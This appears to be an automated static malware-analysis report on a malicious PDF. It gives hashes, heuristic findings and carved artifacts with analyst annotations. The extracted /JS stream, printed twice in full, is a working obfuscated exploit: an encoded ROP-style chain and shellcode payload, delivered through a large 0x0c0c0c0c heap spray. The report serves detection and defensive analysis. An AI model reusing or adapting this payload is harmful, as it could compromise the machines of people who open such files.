Malicious PDF — malware analysis report

Static analysis result for SHA-256 2ac8be7bca658a8e…

MALICIOUS

PDF

53.6 KB First seen: 2026-05-10
MD5: 42d7fed2e8012edba97dc0da59b971e4 SHA-1: 0333d2980778b7e4c6efece2d035e8980c5a7825 SHA-256: 2ac8be7bca658a8e262cd1c3d3ec903a0d974eaaa6dd0be1b81d103f21f8d25f
76 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture (XFA), which can carry its own script logic. In this sample the XFA packet (object 14, 435 bytes, visible at the end of the second artifact preview) holds only a &lt;config&gt; block and an empty &lt;template&gt; with no script; the executable content is the /JS stream in object 12.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.bitstream.com — In PDF document text (Bitstream is a font vendor; this string most likely comes from the embedded sfnt font's metadata and is not a network indicator on its own — verify before adding it to any blocklist)
    • http://ns.adobe.com/xdp/ — Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/ — Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/ — Referenced by PDF JavaScript
    Note: these three are XML namespace identifiers from the XFA packet (object 14), not network destinations. The "Referenced by PDF JavaScript" attribution is most likely an artifact of the second carve of object 12 (javascript_obj0012_001.js), which runs past the end of the /JS stream and includes objects 13–14. Do not treat them as C2 or download indicators.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3C2 3878 bytes
SHA-256: 97bc96839704ed310d5cd09de564691f74ff79e48b8e394299269c046ceb380d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
7 of 12 identifiers look randomly generated (e.g. 'AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZi') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
// Analyst annotation. The code below is the carved stream byte-for-byte (see SHA-256 above);
// only comment lines have been added so the artifact remains verifiable against its hash.
// Aliases the global unescape() under a mangled name so later calls never contain the literal token.
var coQNTegmyZyMIoYvUpMDsMcYhZvSrCSSuvFZRTLCQEcbGiRQXLN = unescape;
// %uXXXX escapes decode to 16-bit words. The string opens with 0x41414141, then a run of
// 0x4a80xxxx / 0x4a84xxxx / 0x4a85xxxx / 0x4a8axxxx little-endian dwords interleaved with small
// constants, then a high-entropy tail starting at %uf0be. NOTE(review): the pointer run reads like a
// ROP-style chain into a fixed-address module and the tail like an encoded payload — the bytes
// d9 74 24 f4 5d (fnstenv/pop GetPC idiom) appear near its start — but the targeted module and
// decoder cannot be confirmed from the script alone; disassemble the decoded bytes to verify.
var UrxEhWImpsoluHkJIGhnZCgOCfDt = coQNTegmyZyMIoYvUpMDsMcYhZvSrCSSuvFZRTLCQEcbGiRQXLN( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uf0be%ud19a%u3138%udac9%ud9c4%u2474%u5df4%u49b1%ued83%u31fc%u0e75%u7503%u120e%u2d6f%u5bd0%uce90%u3b21%u2b18%u6910%u3f7e%ubd01%u6df4%u36aa%u8658%u3a39%ua975%uf08a%u84a3%u350b%u4a6c%u54cf%u9110%ub61c%u5a29%ub751%u876e%ue59a%uc327%u1909%u9143%u1891%u9d83%u62aa%u62a6%ud85e%ub2a9%u57cf%u2ae1%u3f7b%u4bd2%u5ca8%u052e%u96c5%u94c4%ue70f%ua725%uab6f%u071b%ub262%ua05c%uc19d%ud296%ud120%ua86c%u54fe%u0a71%uce74%uaa51%u8859%ua012%udf16%ua57d%u0ca9%ud1f6%ub322%u53d9%u9770%u38fd%ub622%ue4a4%uc785%u41b7%u6d79%u60b3%u176e%uec9e%u2543%ued21%u3ecb%udf52%u9454%u53fc%u321c%u94fa%u8237%u6a94%uf2b8%ua8bd%ua2ec%u19d5%u298d%ua526%ufd58%u0976%ubd33%ue926%u55e3%ue62d%u45dc%u2c4e%uef75%ua7b4%u47ba%u1fb6%u9553%u4eb7%u10ff%u1a51%u74ef%ub3c9%udd96%u2281%uc856%u65ef%ufedc%u2b10%u8b15%udc02%uc6d5%u4b79%ufde9%u7414%uf97f%u23be%u0317%u04e6%ufcb8%u1ecd%u6871%u48ae%u7c7e%u892e%u1628%ue12e%u428c%u147d%u5fd3%u8511%u5f46%u7940%u37c0%ua46e%u9
826%u8391%ue5b6%uea47%u1f3c%u1ee2%u41fd' );
// Builds "%u0c0c%u0c0c" from one-character fragments so the literal never appears in the stream;
// decoded it is the 0x0c0c0c0c filler that the report's "heap spray 0x0C" indicator refers to.
var cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm = coQNTegmyZyMIoYvUpMDsMcYhZvSrCSSuvFZRTLCQEcbGiRQXLN( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
// Doubles the filler until length + 28 reaches 65536 characters (just under 128 KiB of UTF-16);
// the +20+8 presumably reserves room for string/heap headers — not verifiable from the script.
while (cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm.length + 20 + 8 < 65536) cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm+=cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm;
// Spray block layout: (0x0c0c-0x24)/2 = 1524 characters of filler, then the decoded payload, then filler again.
AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ = cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm.substring(0, (0x0c0c-0x24)/2);
AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ += UrxEhWImpsoluHkJIGhnZCgOCfDt;
AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ += cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm;
// Truncates the block to 65536/2 = 32768 characters (64 KiB), then doubles it until it is 0x80000 characters (1 MiB).
HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh = AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ.substring(0, 65536/2);
while(HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh.length < 0x80000) HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh += HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh;
// Trims to 0x80000 - (0x1020-0x08)/2 characters; the subtraction presumably accounts for allocator
// overhead so each block lands on a fixed-size boundary — TODO confirm against the target allocator.
suUbiJqpWcoQbSdVw = HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh.substring(0, 0x80000 - (0x1020-0x08) / 2);
// Keeps 0x1f0 = 496 copies (~496 MiB) alive in an array. Appending "s" presumably forces a distinct
// string allocation per element instead of 496 references to the same buffer.
var oOOxBs = new Array();
for (EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ=0;EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ<0x1f0;EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ++) oOOxBs[EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ]=suUbiJqpWcoQbSdVw+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3E4 4764 bytes
Note: this carve starts 0x22 bytes after javascript_obj0012_000.js and is 886 bytes longer. As far as the preview shows, the script is the same; the extra bytes are trailing PDF structure — `endstream`/`endobj`, objects 13–14 (the XFA packet), the xref table and trailer — meaning the carver overran the end of the /JS stream. The differing SHA-256 reflects those appended bytes, not a second script.
SHA-256: 54bc56912eeb3413a4a889fdd8213c4aaaf11b74dd78b53326d1e9a137a4ca48
Preview script
First 1,000 lines of the extracted script
// Analyst annotation. Code is byte-for-byte the carved stream; the visible script is identical to
// javascript_obj0012_000.js — this carve only differs in the PDF structure appended after it.
// unescape() aliased under a mangled name.
var coQNTegmyZyMIoYvUpMDsMcYhZvSrCSSuvFZRTLCQEcbGiRQXLN = unescape;
// Payload string: 0x41414141, a run of 0x4a8xxxxx little-endian dwords with small constants, then a
// high-entropy tail from %uf0be onward. NOTE(review): consistent with a ROP-style chain plus an
// encoded stage (the GetPC bytes d9 74 24 f4 5d are visible near the tail's start) — confirm by
// decoding and disassembling; the target module is not identifiable from the script alone.
var UrxEhWImpsoluHkJIGhnZCgOCfDt = coQNTegmyZyMIoYvUpMDsMcYhZvSrCSSuvFZRTLCQEcbGiRQXLN( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uf0be%ud19a%u3138%udac9%ud9c4%u2474%u5df4%u49b1%ued83%u31fc%u0e75%u7503%u120e%u2d6f%u5bd0%uce90%u3b21%u2b18%u6910%u3f7e%ubd01%u6df4%u36aa%u8658%u3a39%ua975%uf08a%u84a3%u350b%u4a6c%u54cf%u9110%ub61c%u5a29%ub751%u876e%ue59a%uc327%u1909%u9143%u1891%u9d83%u62aa%u62a6%ud85e%ub2a9%u57cf%u2ae1%u3f7b%u4bd2%u5ca8%u052e%u96c5%u94c4%ue70f%ua725%uab6f%u071b%ub262%ua05c%uc19d%ud296%ud120%ua86c%u54fe%u0a71%uce74%uaa51%u8859%ua012%udf16%ua57d%u0ca9%ud1f6%ub322%u53d9%u9770%u38fd%ub622%ue4a4%uc785%u41b7%u6d79%u60b3%u176e%uec9e%u2543%ued21%u3ecb%udf52%u9454%u53fc%u321c%u94fa%u8237%u6a94%uf2b8%ua8bd%ua2ec%u19d5%u298d%ua526%ufd58%u0976%ubd33%ue926%u55e3%ue62d%u45dc%u2c4e%uef75%ua7b4%u47ba%u1fb6%u9553%u4eb7%u10ff%u1a51%u74ef%ub3c9%udd96%u2281%uc856%u65ef%ufedc%u2b10%u8b15%udc02%uc6d5%u4b79%ufde9%u7414%uf97f%u23be%u0317%u04e6%ufcb8%u1ecd%u6871%u48ae%u7c7e%u892e%u1628%ue12e%u428c%u147d%u5fd3%u8511%u5f46%u7940%u37c0%ua46e%u9
826%u8391%ue5b6%uea47%u1f3c%u1ee2%u41fd' );
// "%u0c0c%u0c0c" assembled from single characters to evade literal matching; decodes to the 0x0c0c0c0c filler.
var cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm = coQNTegmyZyMIoYvUpMDsMcYhZvSrCSSuvFZRTLCQEcbGiRQXLN( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
// Grow filler until length + 28 reaches 65536 characters (the 28 presumably reserves header space — unverified).
while (cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm.length + 20 + 8 < 65536) cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm+=cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm;
// Block = 1524 characters of filler ((0x0c0c-0x24)/2) + payload + filler.
AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ = cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm.substring(0, (0x0c0c-0x24)/2);
AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ += UrxEhWImpsoluHkJIGhnZCgOCfDt;
AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ += cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm;
// Cut to 32768 characters, then double up to 0x80000 characters (1 MiB).
HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh = AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ.substring(0, 65536/2);
while(HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh.length < 0x80000) HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh += HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh;
// Final trim of (0x1020-0x08)/2 characters — presumably allocator-overhead alignment; TODO confirm.
suUbiJqpWcoQbSdVw = HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh.substring(0, 0x80000 - (0x1020-0x08) / 2);
// 496 (0x1f0) spray blocks retained in an array; the "+ \"s\"" presumably defeats string sharing so each is a separate allocation.
var oOOxBs = new Array();
for (EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ=0;EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ<0x1f0;EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ++) oOOxBs[EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ]=suUbiJqpWcoQbSdVw+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000054044 00000 n
0000054077 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54563
%%EOF
font_00_sfnt_off0000032f.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x32F 49224 bytes
SHA-256: 263b1dee80ba6825cc22da5188921f5941214d28be284bb0ed19cecd88b72028
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C. Caveat: a 0x0C-byte-pattern hit inside a font binary is weak evidence on its own, since glyph and table data can legitimately contain such runs; the 0x0c0c0c0c spray is established concretely by the JavaScript in object 12, not by this stream. The candidate code regions in a 48 KiB sfnt font do warrant manual follow-up — disassemble the flagged offsets and check the font's table directory for entries whose offsets or lengths do not fit the file — before treating the font as benign.